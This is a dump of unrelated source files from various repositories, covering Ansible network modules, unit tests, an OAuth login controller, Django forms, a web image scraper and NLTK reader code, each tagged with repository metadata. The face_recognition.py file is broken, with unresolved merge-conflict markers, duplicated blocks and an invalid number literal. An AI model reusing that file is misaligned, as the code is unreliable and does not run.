service_group_method=dict(type='str', default='round-robin',
aliases=['method'],
choices=['round-robin',
'weighted-rr',
'least-connection',
'weighted-least-connection',
'service-least-connection',
'service-weighted-least-connection',
'fastest-response',
'least-request',
'round-robin-strict',
'src-ip-only-hash',
'src-ip-hash']),
servers=dict(type='list', aliases=['server', 'member'], default=[]),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=False
)
host = module.params['host']
username = module.params['username']
password = module.params['password']
state = module.params['state']
write_config = module.params['write_config']
slb_service_group = module.params['service_group']
slb_service_group_proto = module.params['service_group_protocol']
slb_service_group_method = module.params['service_group_method']
slb_servers = module.params['servers']
if slb_service_group is None:
module.fail_json(msg='service_group is required')
axapi_base_url = 'https://' + host + '/services/rest/V2.1/?format=json'
load_balancing_methods = {'round-robin': 0,
'weighted-rr': 1,
'least-connection': 2,
'weighted-least-connection': 3,
'service-least-connection': 4,
'service-weighted-least-connection': 5,
'fastest-response': 6,
'least-request': 7,
'round-robin-strict': 8,
'src-ip-only-hash': 14,
'src-ip-hash': 15}
if not slb_service_group_proto or slb_service_group_proto.lower() == 'tcp':
protocol = 2
else:
protocol = 3
# validate the server data list structure
validate_servers(module, slb_servers)
json_post = {
'service_group': {
'name': slb_service_group,
'protocol': protocol,
'lb_method': load_balancing_methods[slb_service_group_method],
}
}
# first we authenticate to get a session id
session_url = axapi_authenticate(module, axapi_base_url, username, password)
# then we check to see if the specified group exists
slb_result = axapi_call(module, session_url + '&method=slb.service_group.search', json.dumps({'name': slb_service_group}))
slb_service_group_exist = not axapi_failure(slb_result)
changed = False
if state == 'present':
# before creating/updating we need to validate that servers
# defined in the servers list exist to prevent errors
checked_servers = []
for server in slb_servers:
result = axapi_call(module, session_url + '&method=slb.server.search', json.dumps({'name': server['server']}))
if axapi_failure(result):
module.fail_json(msg="the server %s specified in the servers list does not exist" % server['server'])
checked_servers.append(server['server'])
if not slb_service_group_exist:
result = axapi_call(module, session_url + '&method=slb.service_group.create', json.dumps(json_post))
if axapi_failure(result):
module.fail_json(msg=result['response']['err']['msg'])
changed = True
else:
# check to see if the service group definition without the
# server members is different, and update that individually
# if it needs it
do_update = False
for field in VALID_SERVICE_GROUP_FIELDS:
if json_post['service_group'][field] != slb_result['service_group'][field]:
do_update = True
break
if do_update:
result = axapi_call(module, session_url + '&method=slb.service_group.update', json.dumps(json_post))
if axapi_failure(result):
module.fail_json(msg=result['response']['err']['msg'])
changed = True
# next we pull the defined list of servers out of the returned
# results to make it a bit easier to iterate over
defined_servers = slb_result.get('service_group', {}).get('member_list', [])
# next we add/update new member servers from the user-specified
# list if they're different or not on the target device
for server in slb_servers:
found = False
different = False
for def_server in defined_servers:
if server['server'] == def_server['server']:
found = True
for valid_field in VALID_SERVER_FIELDS:
if server[valid_field] != def_server[valid_field]:
different = True
break
if found or different:
break
# add or update as required
server_data = {
"name": slb_service_group,
"member": server,
}
if not found:
result = axapi_call(module, session_url + '&method=slb.service_group.member.create', json.dumps(server_data))
changed = True
elif different:
result = axapi_call(module, session_url + '&method=slb.service_group.member.update', json.dumps(server_data))
changed = True
# finally, remove any servers that are on the target
# device but were not specified in the list given
for server in defined_servers:
found = False
for slb_server in slb_servers:
if server['server'] == slb_server['server']:
found = True
break
# remove if not found
server_data = {
"name": slb_service_group,
"member": server,
}
if not found:
result = axapi_call(module, session_url + '&method=slb.service_group.member.delete', json.dumps(server_data))
changed = True
# if we changed things, get the full info regarding
# the service group for the return data below
if changed:
result = axapi_call(module, session_url + '&method=slb.service_group.search', json.dumps({'name': slb_service_group}))
else:
result = slb_result
elif state == 'absent':
if slb_service_group_exist:
result = axapi_call(module, session_url + '&method=slb.service_group.delete', json.dumps({'name': slb_service_group}))
changed = True
else:
result = dict(msg="the service group was not present")
# if the config has changed, save the config unless otherwise requested
if changed and write_config:
write_result = axapi_call(module, session_url + '&method=system.action.write_memory')
if axapi_failure(write_result):
module.fail_json(msg="failed to save the configuration: %s" % write_result['response']['err']['msg'])
# log out of the session nicely and exit
axapi_call(module, session_url + '&method=session.close')
module.exit_json(changed=changed, content=result)
# standard ansible module imports
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.a10 import *
main()
|
haad/ansible-modules-extras
|
network/a10/a10_service_group.py
|
Python
|
gpl-3.0
| 13,447
|
"""airports.py provides an example Steno3D project of airports"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from .base import BaseExample, exampleproperty
from ..point import Mesh0D, Point
from ..project import Project
DEG2RAD = np.pi/180
FT2KM = 12*2.54/100/1000
RADIUS = 6371
class Airports(BaseExample):
"""Class containing components of airport project. Components can be
viewed individually or copied into new resources or projects with
get_resources() and get_project(), respectively.
"""
@exampleproperty
def filenames(self):
"""airport files"""
return ['airports.dat', 'latitude.npy', 'longitude.npy',
'altitude.npy', 'license.txt']
@exampleproperty
def datafile(self):
"""full path to airport data file"""
return Airports.fetch_data(filename='airports.dat',
download_if_missing=False,
verbose=False)
@exampleproperty
def latitude(self):
"""Airport lat, degrees, from openflights.org"""
return np.load(Airports.fetch_data(filename='latitude.npy',
download_if_missing=False,
verbose=False))
@exampleproperty
def longitude(self):
"""Airport lon, degrees, from openflights.org"""
return np.load(Airports.fetch_data(filename='longitude.npy',
download_if_missing=False,
verbose=False))
@exampleproperty
def altitude(self):
"""Airport alt, km, from openflights.org"""
return np.load(Airports.fetch_data(filename='altitude.npy',
download_if_missing=False,
verbose=False))
@classmethod
def get_project(self):
"""return airport points project"""
proj = Project(
title='Airport',
description='Project with airport points'
)
Point(
project=proj,
mesh=Mesh0D(
vertices=np.c_[self.geo_to_xyz(self.latitude,
self.longitude,
self.altitude)]
),
title='Airport Points'
)
return proj
@staticmethod
def geo_to_xyz(lat, lon, alt):
"""function geo_to_xyz
Inputs:
lat: latitude, degrees
lon: longitude, degrees
alt: altitude, km
Outputs:
x, y, z: spatial coordiantes relative to the center of the earth
Note:
This function assumes a shpherical earth
"""
lat *= DEG2RAD
lon *= DEG2RAD
x = (RADIUS + alt)*np.cos(lat)*np.cos(lon)
y = (RADIUS + alt)*np.cos(lat)*np.sin(lon)
z = (RADIUS + alt)*np.sin(lat)
return x, y, z
@staticmethod
def read_airports_data(filename):
"""Extract latitude, longitude, and altitude from file"""
lat = [] # Latitude
lon = [] # Longitude
alt = [] # Altitude
with open(filename) as f:
for line in f:
data = line.rstrip().split(',')
lat.append(float(data[6])*DEG2RAD)
lon.append(float(data[7])*DEG2RAD)
alt.append(float(data[8])*FT2KM)
return np.array(lat), np.array(lon), np.array(alt)
|
3ptscience/steno3dpy
|
steno3d/examples/airports.py
|
Python
|
mit
| 3,650
|
from lldbsuite.test import lldbinline
from lldbsuite.test import decorators
lldbinline.MakeInlineTest(__file__, globals(), [decorators.skipIf(bugnumber="rdar://53754063")])
|
apple/swift-lldb
|
packages/Python/lldbsuite/test/commands/expression/completion-crash2/TestCompletionCrash2.py
|
Python
|
apache-2.0
| 174
|
__problem_title__ = "Exploring Pascal's triangle"
__problem_url___ = "https://projecteuler.net/problem=148"
__problem_description__ = "We can easily verify that none of the entries in the first seven rows " \
"of Pascal's triangle are divisible by 7: However, if we check the " \
"first one hundred rows, we will find that only 2361 of the 5050 " \
"entries are divisible by 7. Find the number of entries which are " \
"divisible by 7 in the first one billion (10 ) rows of Pascal's " \
"triangle."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
jrichte43/ProjectEuler
|
Problem-0148/solutions.py
|
Python
|
gpl-3.0
| 999
|
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import unittest
from cflib.crtp.crtpstack import CRTPPacket
class CRTPPacketTest(unittest.TestCase):
def setUp(self):
self.callback_count = 0
self.sut = CRTPPacket()
def test_that_port_and_channle_is_encoded_in_header(self):
# Fixture
self.sut.set_header(2, 1)
# Test
actual = self.sut.get_header()
# Assert
expected = 0x2d
self.assertEqual(expected, actual)
def test_that_port_is_truncated_in_header(self):
# Fixture
port = 0xff
self.sut.set_header(port, 0)
# Test
actual = self.sut.get_header()
# Assert
expected = 0xfc
self.assertEqual(expected, actual)
def test_that_channel_is_truncated_in_header(self):
# Fixture
channel = 0xff
self.sut.set_header(0, channel)
# Test
actual = self.sut.get_header()
# Assert
expected = 0x0f
self.assertEqual(expected, actual)
def test_that_port_and_channel_is_encoded_in_header_when_set_separat(self):
# Fixture
self.sut.port = 2
self.sut.channel = 1
# Test
actual = self.sut.get_header()
# Assert
expected = 0x2d
self.assertEqual(expected, actual)
def test_that_default_header_is_set_when_constructed(self):
# Fixture
# Test
actual = self.sut.get_header()
# Assert
expected = 0x0c
self.assertEqual(expected, actual)
def test_that_header_is_set_when_constructed(self):
# Fixture
sut = CRTPPacket(header=0x21)
# Test
actual = sut.get_header()
# Assert
self.assertEqual(0x2d, actual)
self.assertEqual(2, sut.port)
self.assertEqual(1, sut.channel)
|
bitcraze/crazyflie-lib-python
|
test/crtp/test_crtpstack.py
|
Python
|
gpl-2.0
| 2,797
|
import cv2
import sys
#import matplotlib.pyplot as pt
import numpy as np
import numpy.linalg as la
import math as mt
#Content of out eigens
<<<<<<< HEAD:face_recognition.py
# there would be five images of each person
# the collumns would be the frob norm of each type
# 4 rows for each person
# 1)Smiling
# 2)Sad
# 3)Serious
# 4)Blank
# 5)If wearing specs then without specs
# 6)looking left
# 7)looking right
#ournorms = {'Abhishek':[5916.56,6155.725,5835.83,6033.245,5922.402,6207.052,6028.91],
# 'Akshay':[6268.704,6335.443,6119.169,6277.252,6126.155,6232.754,6294.937],
# 'Chris':[6479.241,6297.295,6477.624,6463.082,6385.727,6275.596,6200.595],
# 'Tim':[6507.45,6569.225,6637.975,6731.95,6546.934,6239.888,6529.477]}
ournorms = {'Abhishek':[5866.278,6229.924,6123.536,5988.862,5966.183,5990.367,5661.118],
'Akshay':[6748.139,5658.617,6238.200,6671.678,6228.899,6167.573,5830.901],
'Chris':[6312.924,6374.821,6465.274,6275.596,6596.240,6382.099,6456.81], #left right serious
'Tim':[6226.022,6010.737,6107.618,6107.386,5994.380,5916.834,7052.4.3]}
indbuffervals = {'Abhishek':100,
'Akshay':100,
<<<<<<< HEAD:face_recognition.py
'Chris':50,
=======
'Chris':200,
>>>>>>> origin/master:facial_recognition.py
'Tim':150}
#hardcode values into ournorms above
imagePath = sys.argv[1]
<<<<<<< HEAD:face_recognition.py
def recognizeFace(image,faces):
=======
def recognizeFace(faces, image):
>>>>>>> origin/master:facial_recognition.py
retval = True
if(len(faces)>10):
print("Fuck it too many faces shoot everyone")
return True, 100
for i in range(faces.shape[0]):
x, y, w, h = faces[i]
bufw = (400 - w)/2
bufh = (400 - h)/2
inmod = image[y-bufw:y+w+bufw,x-bufh:x+h+bufh]
retwhat = checker(inmod)
retval = retwhat and retval
return retval,len(faces)
=======
#there would be five images of each person
#the collumns would be the frob norm of each type
#4 rows for each person
#1)Smiling
#2)Sad
#3)Serious
#4)Blank
#5)If wearing specs then without specs
#6)looking left
#7)looking right
#ournorms = {'Abhishek':[5916.56,6155.725,5835.83,6033.245,5922.402,6207.052,6028.91],
#'Akshay':[6268.704,6335.443,6119.169,6277.252,6126.155,6232.754,6294.937],
#'Chris':[6479.241,6297.295,6477.624,6463.082,6385.727,6275.596,6200.595],
#'Tim':[6507.45,6569.225,6637.975,6731.95,6546.934,6239.888,6529.477]}
ournorms = {'Abhishek':[5866.278,6229.924,6123.536,5988.862,5966.183,5990.367,5661.118],
'Akshay':[6748.139,5658.617,6238.200,6671.678,6228.899,6167.573,5830.901],
'Chris':[6312.924,6374.821,6465.274,6275.596,6596.240,6382.099,6456.81],
'Tim':[6226.022,6010.737,6107.618,6107.386,5994.380,5916.834,7052.43]}
indbuffervals = {'Abhishek':100,
'Akshay':100,
'Chris':50,
'Tim':150}
#hardcode values into ournorms above
#imagePath = sys.argv[1]
def recognizeFace(image,faces):
retval = True
if(len(faces)>10):
print("Fuck it too many faces shoot everyone")
return True, 100
for i in range(faces.shape[0]):
x, y, w, h = faces[i]
bufw = (400 - w)/2
bufh = (400 - h)/2
inmod = image[y-bufw:y+w+bufw,x-bufh:x+h+bufh]
retwhat = checker(inmod)
retval = retwhat and retval
return retval,len(faces)
>>>>>>> ed4cfb17e7f30b2eda5f67f3661d4598f64953a3:facial_recognition.py
def checker(inmod):
tempnorm = la.norm(inmod)
retval = False
for name,val in ournorms.iteritems():
for j in val:
if(np.abs(j-tempnorm)<indbuffervals[name]):
retval = True;
print("is")
print(name)
break
if(retval):
break
if(not retval):
print("not")
print(name)
return retval
# Get values from command line
def check(image):
#imagePath = sys.argv[1]
#cascPath = sys.argv[2]
imagePath = image
cascPath = "haarcascade_frontalface_default.xml"
# Create the haar cascade
faceCascade = cv2.CascadeClassifier(cascPath)
# Read the image
image = cv2.imread(imagePath)
imnonmod = cv2.imread(imagePath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.25,
minNeighbors=5,
minSize=(40, 40)
)
<<<<<<< HEAD:face_recognition.py
# Draw a rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
<<<<<<< HEAD:face_recognition.py
what = True
if(len(faces)>0):
what, number = recognizeFace(image,faces)
=======
what = True
if(len(faces)>0):
what, number = recognizeFace(faces, image)
>>>>>>> origin/master:facial_recognition.py
# return what to the arduino
if(what is False):
print("intruder detected")
=======
print "Found {0} faces!".format(len(faces))
# Draw a rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
>>>>>>> ed4cfb17e7f30b2eda5f67f3661d4598f64953a3:facial_recognition.py
what = True
<<<<<<< HEAD:face_recognition.py
cv2.imshow("Faces found", image)
<<<<<<< HEAD:face_recognition.py
cv2.waitKey(0)
=======
#cv2.waitKey(0)
return what
=======
if(len(faces)>0):
what, number = recognizeFace(image,faces)
# return what to the arduino
if(what is False):
print("intruder detected")
>>>>>>> ed4cfb17e7f30b2eda5f67f3661d4598f64953a3:facial_recognition.py
>>>>>>> origin/master:facial_recognition.py
cv2.imshow("Faces found", image)
#cv2.waitKey(0)
check(imagePath)
#check(imagePath)
|
timothyong/hackillinois
|
face_recognition.py
|
Python
|
mit
| 5,724
|
import functools
import logging
import simplejson
import werkzeug.utils
from werkzeug.exceptions import BadRequest
import openerp
from openerp import SUPERUSER_ID
import openerp.addons.web.http as oeweb
from openerp.addons.web.controllers.main import db_monodb, set_cookie_and_redirect, login_and_redirect
from openerp.modules.registry import RegistryManager
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# helpers
#----------------------------------------------------------
def fragment_to_query_string(func):
@functools.wraps(func)
def wrapper(self, req, **kw):
if not kw:
return """<html><head><script>
var l = window.location;
var q = l.hash.substring(1);
var r = '/' + l.search;
if(q.length !== 0) {
var s = l.search ? (l.search === '?' ? '' : '&') : '?';
r = l.pathname + l.search + s + q;
}
window.location = r;
</script></head><body></body></html>"""
return func(self, req, **kw)
return wrapper
#----------------------------------------------------------
# Controller
#----------------------------------------------------------
class OAuthController(oeweb.Controller):
_cp_path = '/auth_oauth'
@oeweb.jsonrequest
def list_providers(self, req, dbname):
try:
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
providers = registry.get('auth.oauth.provider')
l = providers.read(cr, SUPERUSER_ID, providers.search(cr, SUPERUSER_ID, [('enabled', '=', True)]))
except Exception:
l = []
return l
@oeweb.httprequest
@fragment_to_query_string
def signin(self, req, **kw):
state = simplejson.loads(kw['state'])
dbname = state['d']
provider = state['p']
context = state.get('c', {})
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
try:
u = registry.get('res.users')
credentials = u.auth_oauth(cr, SUPERUSER_ID, provider, kw, context=context)
cr.commit()
action = state.get('a')
menu = state.get('m')
url = '/'
if action:
url = '/#action=%s' % action
elif menu:
url = '/#menu_id=%s' % menu
return login_and_redirect(req, *credentials, redirect_url=url)
except AttributeError:
# auth_signup is not installed
_logger.error("auth_signup not installed on database %s: oauth sign up cancelled." % (dbname,))
url = "/#action=login&oauth_error=1"
except openerp.exceptions.AccessDenied:
# oauth credentials not valid, user could be on a temporary session
_logger.info('OAuth2: access denied, redirect to main page in case a valid session exists, without setting cookies')
url = "/#action=login&oauth_error=3"
redirect = werkzeug.utils.redirect(url, 303)
redirect.autocorrect_location_header = False
return redirect
except Exception, e:
# signup error
_logger.exception("OAuth2: %s" % str(e))
url = "/#action=login&oauth_error=2"
return set_cookie_and_redirect(req, url)
@oeweb.httprequest
def oea(self, req, **kw):
"""login user via OpenERP Account provider"""
dbname = kw.pop('db', None)
if not dbname:
dbname = db_monodb(req)
if not dbname:
return BadRequest()
registry = RegistryManager.get(dbname)
with registry.cursor() as cr:
IMD = registry['ir.model.data']
try:
model, provider_id = IMD.get_object_reference(cr, SUPERUSER_ID, 'auth_oauth', 'provider_openerp')
except ValueError:
return set_cookie_and_redirect(req, '/?db=%s' % dbname)
assert model == 'auth.oauth.provider'
state = {
'd': dbname,
'p': provider_id,
'c': {'no_user_creation': True},
}
kw['state'] = simplejson.dumps(state)
return self.signin(req, **kw)
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
inovtec-solutions/OpenERP
|
openerp/addons/auth_oauth/controllers/main.py
|
Python
|
agpl-3.0
| 4,484
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
import google.auth # type: ignore
from google.api_core import gapic_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.ads.googleads.v9.resources.types import feed_item_set_link
from google.ads.googleads.v9.services.types import feed_item_set_link_service
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-ads",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class FeedItemSetLinkServiceTransport(metaclass=abc.ABCMeta):
"""Abstract transport class for FeedItemSetLinkService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precomputed wrapped methods
self._wrapped_methods = {
self.get_feed_item_set_link: gapic_v1.method.wrap_method(
self.get_feed_item_set_link,
default_timeout=None,
client_info=client_info,
),
self.mutate_feed_item_set_links: gapic_v1.method.wrap_method(
self.mutate_feed_item_set_links,
default_timeout=None,
client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def get_feed_item_set_link(
self,
) -> typing.Callable[
[feed_item_set_link_service.GetFeedItemSetLinkRequest],
feed_item_set_link.FeedItemSetLink,
]:
raise NotImplementedError
@property
def mutate_feed_item_set_links(
self,
) -> typing.Callable[
[feed_item_set_link_service.MutateFeedItemSetLinksRequest],
feed_item_set_link_service.MutateFeedItemSetLinksResponse,
]:
raise NotImplementedError
__all__ = ("FeedItemSetLinkServiceTransport",)
|
googleads/google-ads-python
|
google/ads/googleads/v9/services/services/feed_item_set_link_service/transports/base.py
|
Python
|
apache-2.0
| 4,414
|
# -*- coding: UTF-8 -*-
# File: naming.py
# Author: Yuxin Wu <ppwwyyxx@gmail.com>
GLOBAL_STEP_OP_NAME = 'global_step'
GLOBAL_STEP_VAR_NAME = 'global_step:0'
# extra variables to summarize during training in a moving-average way
MOVING_SUMMARY_VARS_KEY = 'MOVING_SUMMARY_VARIABLES'
# placeholders for input variables
INPUT_VARS_KEY = 'INPUT_VARIABLES'
# variables that need to be saved for inference, apart from trainable variables
EXTRA_SAVE_VARS_KEY = 'EXTRA_SAVE_VARIABLES'
import tensorflow as tf
SUMMARY_BACKUP_KEYS = [tf.GraphKeys.SUMMARIES, MOVING_SUMMARY_VARS_KEY]
# export all upper case variables
all_local_names = locals().keys()
__all__ = [x for x in all_local_names if x.isupper()]
|
yinglanma/AI-project
|
tensorpack/utils/naming.py
|
Python
|
apache-2.0
| 700
|
# -*- coding: UTF-8 -*-
"""
Unit tests for :class:`click_configfile.ConfigFileReader`.
"""
from __future__ import absolute_import
import os.path
# -----------------------------------------------------------------------------
# TEST SUPPORT
# -----------------------------------------------------------------------------
def write_configfile_with_contents(filename, contents, encoding=None):
encoding = encoding or "UTF-8"
dirname = os.path.dirname(filename) or "."
if not os.path.isdir(dirname):
os.makedirs(dirname)
# PREPARED: with open(filename, "w", encoding=encoding) as config_file:
with open(filename, "w") as config_file:
config_file.write(contents)
|
jenisys/click-configfile
|
tests/_test_support.py
|
Python
|
bsd-3-clause
| 698
|
# Copyright 2015 VPAC
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import six
from django import forms
from django.conf import settings
from karaage.people.models import Group
from karaage.machines.models import Machine
from .models import SoftwareCategory, Software
from .models import SoftwareVersion, SoftwareLicense
class SoftwareForm(forms.ModelForm):
category = forms.ModelChoiceField(queryset=None)
name = forms.CharField()
description = forms.CharField(required=False, widget=forms.Textarea())
homepage = forms.URLField(required=False)
tutorial_url = forms.URLField(required=False)
academic_only = forms.BooleanField(required=False)
restricted = forms.BooleanField(required=False,
help_text="Will require admin approval")
def __init__(self, *args, **kwargs):
super(SoftwareForm, self).__init__(*args, **kwargs)
self.fields['category'].queryset = SoftwareCategory.objects.all()
class Meta:
model = Software
fields = [
'category', 'name', 'description', 'homepage', 'tutorial_url',
'academic_only', 'restricted',
]
class AddPackageForm(SoftwareForm):
group_name = forms.RegexField(
"^%s$" % settings.GROUP_VALIDATION_RE,
required=True,
error_messages={'invalid': settings.GROUP_VALIDATION_ERROR_MSG})
version = forms.CharField()
module = forms.CharField(required=False)
machines = forms.ModelMultipleChoiceField(queryset=None)
license_version = forms.CharField(required=False)
license_date = forms.DateField(required=False)
license_text = forms.CharField(required=False, widget=forms.Textarea())
def __init__(self, *args, **kwargs):
super(AddPackageForm, self).__init__(*args, **kwargs)
self.fields['machines'].queryset = Machine.active.all()
def clean(self):
data = self.cleaned_data
if 'license_version' in data and data['license_version']:
if (not data['license_version']
or 'license_date' not in data
or not data['license_date']
or 'license_text' not in data
or not data['license_text']):
raise forms.ValidationError(
six.u('You must specify all fields in the license section')
)
return data
def save(self, commit=True):
assert commit is True
data = self.cleaned_data
software = super(AddPackageForm, self).save(commit=False)
name = self.cleaned_data['group_name']
software.group, _ = Group.objects.get_or_create(name=name)
software.save()
version = SoftwareVersion(
software=software,
version=data['version'],
module=data['module'],
)
version.save()
version.machines = data['machines']
version.save()
if data['license_version']:
SoftwareLicense.objects.create(
software=software,
version=data['license_version'],
date=data['license_date'],
text=data['license_text'],
)
return software
class LicenseForm(forms.ModelForm):
class Meta:
model = SoftwareLicense
fields = ['software', 'version', 'date', 'text']
class SoftwareVersionForm(forms.ModelForm):
class Meta:
model = SoftwareVersion
fields = ['software', 'version', 'machines', 'module', 'last_used']
class SoftwareCategoryForm(forms.ModelForm):
class Meta:
model = SoftwareCategory
fields = [
'name',
]
|
Karaage-Cluster/karaage-debian
|
karaage/plugins/kgsoftware/forms.py
|
Python
|
gpl-3.0
| 4,299
|
import sys
#sys.path.append('/home/candice/Documents/xxx/music21-1.9.3/music21')
#Alternative: Terminal: cd <path of the folder> then sudo setup.py install
# import PyQt4 QtCore module
from PyQt4.QtCore import *
from music21 import *
#Import and parse an XML file (Example from http://web.mit.edu/music21/)
#sBach = converter.parse('/home/candice/Documents/xxx/Concept Elbums/Archive/Sarisiphirilla/noAbsolution/NoAbsolution.mscz.xml')
#sBach.show('text')
#show melody in musical notation, also works with a MIDI file or XML file as shown above
#converter.parse("tinynotation: 3/4 c4 d8 f g16 a g f#").show()
#Converting a file from whatever notation to XML
#converter.parse('/users/.../docs/composition.etc').write('musicxml')
converter.parse("lilypond: c' e' g' a' c'").write('musicxml')
#FileDump =
converter.parse('/home/candice/Documents/xxx/Concept Elbums/Archive/Sarisiphirilla/noAbsolution/NoAbsolution.mscz.xml')
|
Can123dice/Revisionista
|
main.py
|
Python
|
gpl-2.0
| 935
|
from bs4 import BeautifulSoup
import requests
from random import choice
from io import BytesIO
# default parameters for https://pixabay.com/de/photos
params = {
"min_height": None,
"orientation": None,
"image_type": None,
"cat": None,
"q": None,
"min_width": None,
"order": "ec",
"colors": None,
"pagi": None
}
def get_imgs(params=params, url="https://pixabay.com/de/photos"):
# get page's content
page = requests.get(url).text
# find all imgs from page
soup = BeautifulSoup(page, "html.parser")
imgs = [img.get("src") for img in soup.find_all("img")]
imgs = soup.find_all("img")
return imgs
# not necessary but nice to have
def download_galerie(params=params, url="https://pixabay.com/de/photos"):
imgs = get_imgs(params, url) #get all images
# loop through images
i = 0 # image count
for img in imgs:
# get url the images are hosted on
src = img.get("src")
if (src == "/static/img/blank.gif"):
src = img.get("data-lazy")
# download and save with image count
with open("pics/" + str(i) + ".jpg", "wb") as f:
f.write(requests.get(src).content)
i += 1 # count
def get_img(saveTo=False, params=params, url="https://pixabay.com/de/photos"):
imgs = get_imgs(params, url)
# choose random image from imgs
img = choice(imgs)
# get the url of the img
src = img.get("src")
if src == "/static/img/blank.gif": src = img.get("data-lazy")
# get th img itself
img = requests.get(src).content
img = BytesIO(img)
# save the img if path is given
if (saveTo):
with open(saveTo, "wb") as f:
f.write(img.getvalue())
print(img)
return img
|
Richie-8DK/randomTaquin
|
grab.py
|
Python
|
gpl-3.0
| 1,724
|
# Natural Language Toolkit: Toolbox Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Greg Aumann <greg_aumann@sil.org>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Module for reading, writing and manipulating
Toolbox databases and settings files.
"""
from __future__ import print_function
import os, re, codecs
from StringIO import StringIO
from xml.etree.ElementTree import ElementTree, TreeBuilder, Element, SubElement
from nltk.data import PathPointer, ZipFilePathPointer, find
class StandardFormat(object):
"""
Class for reading and processing standard format marker files and strings.
"""
def __init__(self, filename=None, encoding=None):
self._encoding = encoding
if filename is not None:
self.open(filename)
def open(self, sfm_file):
"""
Open a standard format marker file for sequential reading.
:param sfm_file: name of the standard format marker input file
:type sfm_file: str
"""
if isinstance(sfm_file, PathPointer):
# [xx] We don't use 'rU' mode here -- do we need to?
# (PathPointer.open doesn't take a mode option)
self._file = sfm_file.open(self._encoding)
else:
self._file = codecs.open(sfm_file, 'rU', self._encoding)
def open_string(self, s):
"""
Open a standard format marker string for sequential reading.
:param s: string to parse as a standard format marker input file
:type s: str
"""
self._file = StringIO(s)
def raw_fields(self):
"""
Return an iterator that returns the next field in a (marker, value)
tuple. Linebreaks and trailing white space are preserved except
for the final newline in each field.
:rtype: iter(tuple(str, str))
"""
join_string = '\n'
line_regexp = r'^%s(?:\\(\S+)\s*)?(.*)$'
# discard a BOM in the first line
first_line_pat = re.compile(line_regexp % u'(?:\ufeff)?'.encode('utf8'))
line_pat = re.compile(line_regexp % '')
# need to get first line outside the loop for correct handling
# of the first marker if it spans multiple lines
file_iter = iter(self._file)
line = file_iter.next()
